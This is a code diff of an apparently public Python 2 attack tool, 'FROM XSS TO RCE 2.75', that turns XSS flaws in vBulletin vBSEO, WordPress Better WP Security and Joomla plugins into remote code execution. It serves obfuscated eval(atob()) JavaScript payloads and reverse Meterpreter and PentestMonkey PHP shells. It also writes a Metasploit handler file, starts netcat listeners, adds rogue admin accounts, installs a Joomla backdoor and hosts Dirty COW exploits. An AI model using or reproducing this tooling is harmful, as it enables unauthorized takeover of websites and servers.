') + return + + return + + except IOError: + self.send_error(404, 'File Not Found: {}'.format(self.path)) + + # Experimental POST-request handling below. + # noinspection PyPep8Naming + # https://stackoverflow.com/questions/4233218/python-how-do-i-get-key-value-pairs-from-the-basehttprequesthandler-http-post-h + def do_POST(self): + try: + content_length = int(self.headers['Content-Length']) # This may cause an error if not set. + post_data = self.rfile.read(content_length) # This may also cause an error in some cases. + + true_filename = "".join(random.sample(random_filename, 5))+".txt" + full_path = "Received_Data/" + true_filename + with open(full_path, "w") as filename: + filename.write(post_data) + print "[*] Wrote POST-data to: {}".format(true_filename) + self.send_response(200) + self.send_header('Content-type', 'text/html') + self.end_headers() + self.wfile.write("Empty" + "

Nothing to see here..

") + return + + except IOError: + self.send_error(404, 'File Not Found: {}'.format(self.path)) + # Dirty COW File Handling - Quick solution -global dcow32_output -global dcow64_output dcow32_file = open("Exploits/dirtycow32.c") dcow64_file = open("Exploits/dirtycow64.c") dcow32_output = dcow32_file.read() dcow64_output = dcow64_file.read() -# To be added in a future version of XSSER -# Joomla Shell File Handling -#global joomla_hello_shell -#joomla_hello_shell_file = open("Payloads/php/hello-world-fixed.zip") -#joomla_hello_shell = joomla_hello_shell_file.read() # Handle funny audio clip # PyGame was generally the best option, as LibVLC experienced clipping issues. -def YouGotShell(): - pygame.mixer.pre_init(48000, -16, 2, 4096) # Change from 48000 to 44100 for lower pitch - pygame.init() - pygame.mixer.init() - pygame.mixer.music.load('Audio/rapshell1.mp3') - pygame.mixer.music.play(1) - return +def you_got_shell(): # Now PEP8 (i.e. the IDE) is happy with the renamed function name xD + pygame.mixer.pre_init(44100, -16, 2, 4096) # Change from 48000 to 44100 for lower pitch + pygame.init() + pygame.mixer.init() + pygame.mixer.music.load('Audio/rapshell1.mp3') + pygame.mixer.music.play(1) + return + + +# TODO: Make the filename dynamic in the future +def read_joomla_shell_file(): + with open("Hello_Shell.zip", "rb") as filename: + return filename.read() + + +# Takes a string as input, and: +# - Removes newlines, comments, etc. +# - Base64 encodes payload. +# - Wraps encoded payload into a JS decoder. +def minify_and_encode_js(javascript_input): + minified = jsmin(javascript_input, quote_chars="'\"") # Removes comments and extra new lines + encoded = base64.b64encode(minified) # Base64 encodes the JS + output = 'eval(atob("{}"));'.format(encoded) # Wraps the content into a B64 JS Decoder. + return output + + +# Automatically gets all IP addresses and uses the first one. +# If multiple IP addresses are found, the user can then choose which to use. +def get_local_ip(): + try: + local_ip = check_output(['hostname', '--all-ip-addresses']).strip() + if len(local_ip.split(' ')) > 1: + print FontColors.BLUE + FontColors.BOLD + print " ╭───────────────────────╮╭───────────╮╭──╮╭──╮" + print " │ FROM XSS TO RCE 2.75 ││ IP Addr ││ ││ │" + print " ╰───────────────────────╯╰───────────╯╰──╯╰──╯" + print FontColors.ENDC + print FontColors.BOLD + " Choose which IP address to use:" + FontColors.ENDC + print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" + counter = 1 + for ip in local_ip.split(' '): + print " â•‘ [{}] {:25} â•‘".format(counter, ip) + counter += 1 + print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" + print FontColors.RED + "\n q. Quit\n" + FontColors.ENDC + ip_choice = raw_input(FontColors.BOLD + FontColors.BLUE + " >> " + FontColors.ENDC) + if ip_choice == 'q': + exit_xsser() + elif not ip_choice.isdigit(): + print FontColors.YELLOW + " [!] Your choice must be an integer. Quitting.." + FontColors.ENDC + exit_xsser(1) + elif int(ip_choice) > len(local_ip.split(' ')) or int(ip_choice) == 0: + print FontColors.YELLOW + " [!] Option not recognized. Quitting.." + FontColors.ENDC + exit_xsser(1) + else: + ip_choice = int(ip_choice) - 1 + return local_ip.split(' ')[ip_choice] + else: + return local_ip + except KeyboardInterrupt: + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." + FontColors.ENDC + exit_xsser(1) + + +# Returns a blue colored IP address +# Formerly known as a variable: color_local_ip +def get_colored_ip(ip_address): + return FontColors.BLUE + ip_address + FontColors.ENDC # ====================== # # MENU FUNCTIONS # ====================== # - + + # Main menu +# TODO: Make a better menu system in the future. def main_menu(): - os.system('clear') - print fontcolors.BLUE + fontcolors.BOLD - print " ╭──────────────────────╮╭───────────╮╭──╮╭──╮" - print " │ FROM XSS TO RCE 2.5 ││ Main Menu ││ ││ │" - print " ╰──────────────────────╯╰───────────╯╰──╯╰──╯" - print fontcolors.ENDC - print fontcolors.BOLD + " Choose which exploit to use: (OSVDB-ID)" + fontcolors.ENDC - print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" - print " â•‘ [1] vBulletin - vBSEO XSS (70854) â•‘" - print " â•‘ [2] WordPress - Better WP Security XSS (95884) â•‘" - print " â•‘ [3] Joomla - Security Check (EDB-ID 39879) â•‘" - print " â•‘ â•‘" - print " â•‘ [?] Drupal (To be implemented) â•‘" - print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" - print fontcolors.RED + "\n q. Quit\n" + fontcolors.ENDC - choose_menu(exec_menu, 0, 0) - return + os.system('clear') + print FontColors.BLUE + FontColors.BOLD + print " ╭───────────────────────╮╭───────────╮╭──╮╭──╮" + print " │ FROM XSS TO RCE 2.75 ││ Main Menu ││ ││ │" + print " ╰───────────────────────╯╰───────────╯╰──╯╰──╯" + print FontColors.ENDC + print FontColors.BOLD + " Choose which exploit to use: (OSVDB-ID)" + FontColors.ENDC + print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" + print " â•‘ [1] vBulletin - vBSEO XSS (70854) [!] â•‘" + print " â•‘ [2] WordPress - Better WP Security XSS (95884) â•‘" + print " â•‘ [3] Joomla - Security Check (EDB-ID 39879) â•‘" + print " â•‘ â•‘" + print " â•‘ [?] Drupal (To be implemented) â•‘" + print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" + print FontColors.RED + "\n q. Quit\n" + FontColors.ENDC + choose_menu(exec_menu, 0, 0) + return + # vBulletin menu def menu1(): - global exploit_selection - exploit_selection="vBSEO" - print fontcolors.BLUE + fontcolors.BOLD - print " ╭──────────────────────╮╭───────────╮╭──╮╭──╮" - print " │ FROM XSS TO RCE 2.5 ││ vBulletin ││ ││ │" - print " ╰──────────────────────╯╰───────────╯╰──╯╰──╯" - print fontcolors.ENDC - print fontcolors.BOLD + " Choose which payload to use:" + fontcolors.ENDC - print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" - print " â•‘ [1] New Plugin (misc.php hook) â•‘" - print " â•‘ â•‘" - print " â•‘ â•‘" - print " â•‘ â•‘" - print " â•‘ [9] Back â•‘" - print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" - print fontcolors.RED + "\n q. Quit\n" + fontcolors.ENDC - choose_menu(exec_sub_menu, vbulletin_menu, 1) - return + global exploit_selection + exploit_selection = "vBSEO" + print FontColors.BLUE + FontColors.BOLD + print " ╭───────────────────────╮╭───────────╮╭──╮╭──╮" + print " │ FROM XSS TO RCE 2.75 ││ vBulletin ││ ││ │" + print " ╰───────────────────────╯╰───────────╯╰──╯╰──╯" + print FontColors.ENDC + print FontColors.BOLD + " Choose which payload to use:" + FontColors.ENDC + print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" + print " â•‘ [1] New Plugin (misc.php hook) â•‘" + print " â•‘ â•‘" + print " â•‘ Note: vBSEO is no longer updated. Many forums â•‘" + print " â•‘ have likely stopped using this plugin. â•‘" + print " â•‘ [9] Back â•‘" + print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" + print FontColors.RED + "\n q. Quit\n" + FontColors.ENDC + choose_menu(exec_sub_menu, vbulletin_menu, 1) + return + # WordPress menu def menu2(): - global exploit_selection - exploit_selection="BetterWPSecurity" - print fontcolors.BLUE + fontcolors.BOLD - print " ╭──────────────────────╮╭───────────╮╭──╮╭──╮" - print " │ FROM XSS TO RCE 2.5 ││ WordPress ││ ││ │" - print " ╰──────────────────────╯╰───────────╯╰──╯╰──╯" - print fontcolors.ENDC - print fontcolors.BOLD + " Choose which payload to use:" + fontcolors.ENDC - print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" - print " â•‘ [1] WPSEO (robots.txt & .htaccess) â•‘" - print " â•‘ [2] WordPress Current Theme (footer.php) â•‘" - print " â•‘ [3] WordPress Hello Plugin (hello.php) â•‘" - print " â•‘ â•‘" - print " â•‘ [9] Back â•‘" - print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" - print fontcolors.RED + "\n q. Quit\n" + fontcolors.ENDC - choose_menu(exec_sub_menu, wordpress_menu, 2) - return + global exploit_selection + exploit_selection = "BetterWPSecurity" + print FontColors.BLUE + FontColors.BOLD + print " ╭───────────────────────╮╭───────────╮╭──╮╭──╮" + print " │ FROM XSS TO RCE 2.75 ││ WordPress ││ ││ │" + print " ╰───────────────────────╯╰───────────╯╰──╯╰──╯" + print FontColors.ENDC + print FontColors.BOLD + " Choose which payload to use:" + FontColors.ENDC + print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" + print " â•‘ [1] WPSEO (robots.txt & .htaccess) â•‘" + print " â•‘ [2] WordPress Current Theme (footer.php) â•‘" + print " â•‘ [3] WordPress Hello Plugin (hello.php) â•‘" + print " â•‘ â•‘" + print " â•‘ [9] Back â•‘" + print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" + print FontColors.RED + "\n q. Quit\n" + FontColors.ENDC + choose_menu(exec_sub_menu, wordpress_menu, 2) + return + # Joomla menu def menu3(): - global exploit_selection - exploit_selection="SecurityCheck" # NEW OPTION - print fontcolors.BLUE + fontcolors.BOLD - print " ╭──────────────────────╮╭───────────╮╭──╮╭──╮" - print " │ FROM XSS TO RCE 2.5 ││ WordPress ││ ││ │" - print " ╰──────────────────────╯╰───────────╯╰──╯╰──╯" - print fontcolors.ENDC - print fontcolors.BOLD + " Choose which payload to use:" + fontcolors.ENDC - print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" - print " â•‘ [1] Add New Super User (Admin) â•‘" - print " â•‘ â•‘" - print " â•‘ Note: Select \"no payload\" on next page. â•‘" - print " â•‘ â•‘" - print " â•‘ [9] Back â•‘" - print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" - print fontcolors.RED + "\n q. Quit\n" + fontcolors.ENDC - choose_menu(exec_sub_menu, joomla_menu, 3) - return + global exploit_selection + exploit_selection = "SecurityCheck" # NEW OPTION + print FontColors.BLUE + FontColors.BOLD + print " ╭───────────────────────╮╭───────────╮╭──╮╭──╮" + print " │ FROM XSS TO RCE 2.75 ││ Joomla! ││ ││ │" + print " ╰───────────────────────╯╰───────────╯╰──╯╰──╯" + print FontColors.ENDC + print FontColors.BOLD + " Choose which payload to use:" + FontColors.ENDC + print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" + print " â•‘ [1] Add New Super User (Admin) â•‘" + print " â•‘ [2] Auto-Install Hello Shell Backdoor [NEW] â•‘" + print " â•‘ â•‘" + print " â•‘ Note: Select \"no payload\" on next page. â•‘" + print " â•‘ â•‘" + print " â•‘ [9] Back â•‘" + print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" + print FontColors.RED + "\n q. Quit\n" + FontColors.ENDC + choose_menu(exec_sub_menu, joomla_menu, 3) + return + # Payload menu def payload_menu_func(origin): - print fontcolors.BLUE + fontcolors.BOLD - print " ╭──────────────────────╮╭───────────╮╭──╮╭──╮" - print " │ FROM XSS TO RCE 2.5 ││ Payloads ││ ││ │" - print " ╰──────────────────────╯╰───────────╯╰──╯╰──╯" - print fontcolors.ENDC - print fontcolors.BOLD + " Choose which shell to use:" + fontcolors.ENDC - print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" - print " â•‘ [1] Reverse Meterpreter (PHP) â•‘" - print " â•‘ [2] PentestMonkey Reverse PHP Shell â•‘" - print " â•‘ [3] PentestMonkey Reverse PHP Shell (Notify) â•‘" - print " â•‘ â•‘" - print " â•‘ [5] No payload (manual upload) â•‘" - print " â•‘ [9] Back â•‘" - print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" - print fontcolors.RED + "\n q. Quit\n" + fontcolors.ENDC - choose_menu(exec_sub_menu, payload_menu, origin) - return - -def preparePayloadBanner(): - print fontcolors.BLUE + fontcolors.BOLD - print " ╭──────────────────────╮╭───────────╮╭──╮╭──╮" - print " │ FROM XSS TO RCE 2.5 ││ Config ││ ││ │" - print " ╰──────────────────────╯╰───────────╯╰──╯╰──╯" - print fontcolors.ENDC + print FontColors.BLUE + FontColors.BOLD + print " ╭───────────────────────╮╭───────────╮╭──╮╭──╮" + print " │ FROM XSS TO RCE 2.75 ││ Payloads ││ ││ │" + print " ╰───────────────────────╯╰───────────╯╰──╯╰──╯" + print FontColors.ENDC + print FontColors.BOLD + " Choose which shell to use:" + FontColors.ENDC + print " â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—" + print " â•‘ [1] Reverse Meterpreter (PHP) â•‘" + print " â•‘ [2] PentestMonkey Reverse PHP Shell â•‘" + print " â•‘ [3] PentestMonkey Reverse PHP Shell (Notify) â•‘" + print " â•‘ â•‘" + print " â•‘ [5] No payload (special cases) â•‘" + print " â•‘ [9] Back â•‘" + print " â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•" + print FontColors.RED + "\n q. Quit\n" + FontColors.ENDC + choose_menu(exec_sub_menu, payload_menu, origin) + return + + +def prepare_payload_banner(): + os.system('clear') + print FontColors.BLUE + FontColors.BOLD + print " ╭───────────────────────╮╭───────────╮╭──╮╭──╮" + print " │ FROM XSS TO RCE 2.75 ││ Config ││ ││ │" + print " ╰───────────────────────╯╰───────────╯╰──╯╰──╯" + print FontColors.ENDC + # Handle menu selection -def choose_menu(MenuType, cms_actions, origin): - try: - choice = raw_input(fontcolors.BOLD + fontcolors.BLUE+ " >> " + fontcolors.ENDC) - except KeyboardInterrupt: - print fontcolors.YELLOW + "\n [!] CTRL+C detected, shutting down." + fontcolors.ENDC - sys.exit() - MenuType(choice, cms_actions, origin) +def choose_menu(menu_type, cms_actions, origin): + choice = 0 # This is just to make the interpreter happy. + try: + choice = raw_input(FontColors.BOLD + FontColors.BLUE + " >> " + FontColors.ENDC) + except KeyboardInterrupt: + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." + FontColors.ENDC + exit_xsser() + menu_type(choice, cms_actions, origin) + # Execute main menu option def exec_menu(choice, cms_actions, origin): - os.system('clear') - ch = choice.lower() - if ch == '': - menu_actions['main_menu']() - else: - try: - menu_actions[ch]() - except KeyError: - print " [!] Invalid selection, please try again.\n" - menu_actions['main_menu']() - return + os.system('clear # {} {}'.format(cms_actions, origin)) # The extra code is just to make the IDE happy. + ch = choice.lower() + if ch == '': + menu_actions['main_menu']() # This doesn't work if we remove () + else: + try: + menu_actions[ch]() # This doesn't work if we remove () + except KeyError: + print " [!] Invalid selection, please try again.\n" + traceback.print_exc() + menu_actions['main_menu']() # This doesn't work if we remove () + return + # Execute sub menu option def exec_sub_menu(choice, sub_actions, origin): - os.system('clear') - ch = choice.lower() - if ch == '': - menu_actions[origin]() # Go back to the sub-menu where we came from, not the main menu - else: - try: - sub_actions[ch]() # Go into the next level sub-menu to choose e.g. payload type - except KeyError: - print " [!] Invalid selection, please try again.\n" - menu_actions[origin]() # Go back to the sub-menu where we came from, not the main menu - return + os.system('clear') + ch = choice.lower() + if ch == '': + menu_actions[origin]() # Go back to the sub-menu where we came from, not the main menu + else: + try: + sub_actions[ch]() # Go into the next level sub-menu to choose e.g. payload type + except KeyError: + print " [!] Invalid selection, please try again.\n" + traceback.print_exc() + menu_actions[origin]() # Go back to the sub-menu where we came from, not the main menu + return + # Back to main menu def back(): - menu_actions['main_menu']() - -# Exit program -def exit(): - sys.exit() + menu_actions['main_menu']() # vBulletin menu def vbmenu1(): - global payload_selection - payload_selection="vb_misc" - payload_menu_func(1) - # vBulletin New Plugin (misc.php hook) + global payload_selection + payload_selection = "vb_misc" + payload_menu_func(1) + # vBulletin New Plugin (misc.php hook) # WordPress menu def wpmenu1(): - global payload_selection - payload_selection="wpseo" - payload_menu_func(2) - # WordPress WPSEO (robots.txt & .htaccess) + global payload_selection + payload_selection = "wpseo" + payload_menu_func(2) + # WordPress WPSEO (robots.txt & .htaccess) + def wpmenu2(): - global payload_selection - payload_selection="wp_footer_theme" - payload_menu_func(2) - # WordPress Current Theme (footer.php) - + global payload_selection + payload_selection = "wp_footer_theme" + payload_menu_func(2) + # WordPress Current Theme (footer.php) + + def wpmenu3(): - global payload_selection - payload_selection="wp_hello_plugin" - payload_menu_func(2) - # WordPress Hello Plugin (hello.php) + global payload_selection + payload_selection = "wp_hello_plugin" + payload_menu_func(2) + # WordPress Hello Plugin (hello.php) # Joomla menu def jmenu1(): - global payload_selection - payload_selection="add_new_admin" - payload_menu_func(3) - # Joomla Add New Admin + global payload_selection + payload_selection = "add_new_admin" + payload_menu_func(3) + # Joomla Add New Admin + + +def jmenu2(): + global payload_selection + payload_selection = "install_backdoor" + payload_menu_func(3) + # Joomla Auto-Install Hello Shell # =============================== # @@ -436,373 +610,514 @@ def jmenu1(): # =============================== # # Payload menus +# TODO: This could be loaded from a separate file in the future? def meterpreter(): - global php_selection - php_selection="meterpreter" - php_output = preparePayload(php_selection) # Stores our configured PHP shell - global js_output - js_output = updateJavaScriptPayload(payload_selection,php_output) # Stores our final JavaScript payload - writeRCfile() # Write an RC file for Metasploit's Msfconsole - rcfile = '/tmp/xsser.rc' - os.system('gnome-terminal --hide-menubar -e "bash -c \'echo [*] Executing metasploit; msfconsole -r '+rcfile+'; exec bash\'"') - handleExploit(exploit_selection,js_output,lhost) + global exploit_selection + global php_selection + php_selection = "meterpreter" + php_output = prepare_payload(php_selection) # Stores our configured PHP shell + global js_output + js_output = update_javascript_payload(payload_selection, php_output) # Stores our final JavaScript payload + js_output = minify_and_encode_js(js_output) # New encoding step in version 2.75 - Extra + write_rc_file() # Write an RC file for Metasploit's Msfconsole + rcfile = '/tmp/xsser.rc' + # os.system( + # 'gnome-terminal --hide-menubar -e "bash -c \'echo [*] Executing metasploit; msfconsole -r ' + rcfile + + # '; exec bash\'"') + os.system('xterm -fa "Monospace" -fs 14 -hold -e "msfconsole -r ' + rcfile + '" &') # Please test this works + # handle_exploit(exploit_selection, js_output, lhost) + handle_exploit(exploit_selection, lhost) # The JS is not used in handle_exploit + def pentestmonkey(): - global php_selection - php_selection="pentestmonkey" - php_output = preparePayload(php_selection) # Stores our configured PHP shell - global js_output - js_output = updateJavaScriptPayload(payload_selection,php_output) # Stores our final JavaScript payload - os.system('gnome-terminal --hide-menubar -e "bash -c \'echo [*] Executing netcat; nc -lnvp '+lport+' -s '+lhost+'; exec bash\'"') - handleExploit(exploit_selection,js_output,lhost) + global php_selection + php_selection = "pentestmonkey" + php_output = prepare_payload(php_selection) # Stores our configured PHP shell + global js_output + js_output = update_javascript_payload(payload_selection, php_output) # Stores our final JavaScript payload + js_output = minify_and_encode_js(js_output) # New encoding step in version 2.75 - Extra + os.system('xterm -fa "Monospace" -fs 14 -hold -e "nc -lnvp ' + lport + ' -s ' + lhost + '" &') + # handle_exploit(exploit_selection, js_output, lhost) + handle_exploit(exploit_selection, lhost) # The JS is not used in handle_exploit + def pentestmonkey_notify(): - global php_selection - php_selection="pentestmonkey_notify" - php_output = preparePayload(php_selection) # Stores our configured PHP shell - global js_output - js_output = updateJavaScriptPayload(payload_selection,php_output) # Stores our final JavaScript payload - os.system('gnome-terminal --hide-menubar -e "bash -c \'echo [*] Executing netcat; nc -lnvp '+lport+' -s '+lhost+'; exec bash\'"') - handleExploit(exploit_selection,js_output,lhost) + global php_selection + php_selection = "pentestmonkey_notify" + php_output = prepare_payload(php_selection) # Stores our configured PHP shell + global js_output + js_output = update_javascript_payload(payload_selection, php_output) # Stores our final JavaScript payload + js_output = minify_and_encode_js(js_output) # New encoding step in version 2.75 - Extra + os.system('xterm -fa "Monospace" -fs 14 -hold -e "nc -lnvp ' + lport + ' -s ' + lhost + '" &') + # handle_exploit(exploit_selection, js_output, lhost) + handle_exploit(exploit_selection, lhost) # The JS is not used in handle_exploit + +# TODO: Optimize and simplify in the future. def payload_not_specified(): - global php_selection - php_selection="payload_not_specified" - php_output = preparePayload(php_selection) # Stores our configured PHP shell - global js_output - js_output = updateJavaScriptPayload(payload_selection,php_output) # Stores our final JavaScript payload - handleExploit(exploit_selection,js_output,lhost) + global php_selection + php_selection = "payload_not_specified" + php_output = prepare_payload(php_selection) # Stores our configured PHP shell + global js_output + js_output = update_javascript_payload(payload_selection, php_output) # Stores our final JavaScript payload + js_output = minify_and_encode_js(js_output) # New encoding step in version 2.75 - Extra + # handle_exploit(exploit_selection, js_output, lhost) + handle_exploit(exploit_selection, lhost) # The JS is not used in handle_exploit -def writeRCfile(): - input = "use multi/handler\n\ +def write_rc_file(): + user_input = "use multi/handler\n\ set payload php/meterpreter/reverse_tcp\n\ -set LHOST "+lhost+"\n\ -set LPORT "+lport+"\n\ +set LHOST " + lhost + "\n\ +set LPORT " + lport + "\n\ run -j" - file = open('/tmp/xsser.rc','w') - file.write(input) - file.close() - -# Preferably, this function needs to load/import the selected exploit module and execute it in the near future. -def handleExploit(exploit,js_payload,localhost): - if exploit == 'vBSEO': - try: - global evil_php - global evil_jsf - global xss_title - global target_link - global finaltarget - global http_port - global activation_file - http_port = 80 # Port to listen on. Does not really need to be dynamic at the moment. - evil_php = "%s%s%s" % (random.randrange(0, 253),random.randrange(1, 256),random.randrange(0, 255)) - evil_jsf = "%s%s%s" % (random.randrange(1, 257),random.randrange(0, 254),random.randrange(1, 258)) - xss_title = 'The Friendly Website" size="70" dir="ltr" tabindex="1">
> "+fontcolors.ENDC) - striptarget = re.compile('(http://|https://)') - newtarget = striptarget.sub('', target_link) - striptarget2 = re.compile('/.*') - finaltarget = striptarget2.sub('', newtarget) - #print finaltarget - # DEBUG: Should return e.g. mycompany.com.au - try: - server = HTTPServer((localhost, http_port), MyHandler) - print fontcolors.BLUE+fontcolors.BOLD+'\n\tâ•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—' - print '\tâ•‘ Started Payload HTTP Server â•‘' - print '\tâ•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•' - print fontcolors.ENDC - print ' [*] Serving attack file from: http://%s:%s/%s.php ' % (localhost,http_port,evil_php) - print ' [*] Serving payload file from: http://%s:%s/%s.js ' % (localhost,http_port,evil_jsf) - print ' [!] Browse to: "'+fontcolors.BLUE+fontcolors.BOLD+'misc.php?activateshell=true'+fontcolors.ENDC+'", to activate the payload.' - print ' [+] DCOW (SUID) 32-bit src is available at: http://%s:%s/dcow32.c' % (localhost,http_port) - print ' [+] DCOW (SUID) 64-bit src is available at: http://%s:%s/dcow64.c' % (localhost,http_port) - print ' [?] Press CTRL+C to stop the server and exit the script. \n' - print '-------------- HTTP Requests Below --------------' - server.serve_forever() - except KeyboardInterrupt: # Get all the unexpected keyboard interrupts - print fontcolors.YELLOW + "\n [!] CTRL+C detected, shutting down." + fontcolors.ENDC - server.socket.close() - sys.exit(1) - except KeyboardInterrupt: # Get all the unexpected keyboard interrupts - print fontcolors.YELLOW + "\n [!] CTRL+C detected, shutting down." + fontcolors.ENDC - sys.exit(1) - elif exploit == 'BetterWPSecurity': - try: - global activation_file - if payload_selection == 'wp_hello_plugin': - activation_file = "/wp-content/plugins/hello.php?" - elif payload_selection == 'wp_footer_theme': - activation_file = "/?" - elif payload_selection == 'wpseo': - activation_file = "/robots.txt?" - else: - activation_file = "Unknown Payload - Restart Script" - sys.exit() - unencoded_payload = '' - base64_payload = '">' - fourohfour_url = "%s%s%s.php?" % (random.randrange(0, 235),random.randrange(1, 214),random.randrange(0, 135)) - try: - conn = httplib.HTTPConnection(target_hostname, 80) - conn.request("GET", "/"+fourohfour_url+base64_payload) - resp = conn.getresponse() - output = resp.read() - if resp.status == 404: - print "\n [*] 404 received, checking that WordPress handled the error." - if re.search("(That page can)", output): - print " [*] It looks like WordPress handled the injection." - http_port = 80 # Port to listen on. Does not really need to be dynamic at the moment. - try: - server = HTTPServer((localhost, http_port), WordPressHandler) - print fontcolors.BLUE+fontcolors.BOLD+'\n\tâ•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—' - print '\tâ•‘ Started Payload HTTP Server â•‘' - print '\tâ•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•' - print fontcolors.ENDC - print ' [*] Serving payload file from: http://%s:%s/x.js ' % (localhost,http_port) - print ' [!] Browse to: "'+fontcolors.BLUE+fontcolors.BOLD+activation_file+'activateshell=true'+fontcolors.ENDC+'", to activate the payload.' - print ' [+] DCOW (SUID) 32-bit src is available at: http://%s:%s/dcow32.c' % (localhost,http_port) - print ' [+] DCOW (SUID) 64-bit src is available at: http://%s:%s/dcow64.c' % (localhost,http_port) - print ' [?] Press CTRL+C to stop the server and exit the script. \n' - print '-------------- HTTP Requests Below --------------' - server.serve_forever() - except KeyboardInterrupt: - server.socket.close() - sys.exit() - else: - print " [!] The web server handled the 404 error page, meaning the injection did not occur within Better WP Security." - except Exception as e: - print " [!] An error occurred: %s\n[!] Shutting down." % e - sys.exit(1) - except KeyboardInterrupt: - print fontcolors.YELLOW + "\n [!] CTRL+C detected, shutting down." + fontcolors.ENDC - sys.exit(1) - elif exploit == 'SecurityCheck': - try: - if payload_selection == 'add_new_admin': - activation_file = "NOT_APPLICABLE" + filepointer = open('/tmp/xsser.rc', 'w') + filepointer.write(user_input) + filepointer.close() + + +# Preferably, this function will load/import the selected exploit module and execute it in the future. +# def handle_exploit(exploit, js_payload, localhost): +def handle_exploit(exploit, localhost): + global js_filename + if exploit == 'vBSEO': + try: + global evil_php + global evil_jsf + global xss_title + global target_link + global finaltarget + global http_port + global activation_file # This may not be needed for the vBSEO module + http_port = 80 # Port to listen on. Does not really need to be dynamic at the moment. + # TODO: Consider making the xsser.py tool automatically send this exploit. + # TODO: Make a "random filename" function. + evil_php = "".join(random.sample(random_filename, 9)) + evil_jsf = "".join(random.sample(random_filename, 9)) + xss_title = 'The Friendly Website" size="70" dir="ltr" tabindex="1">
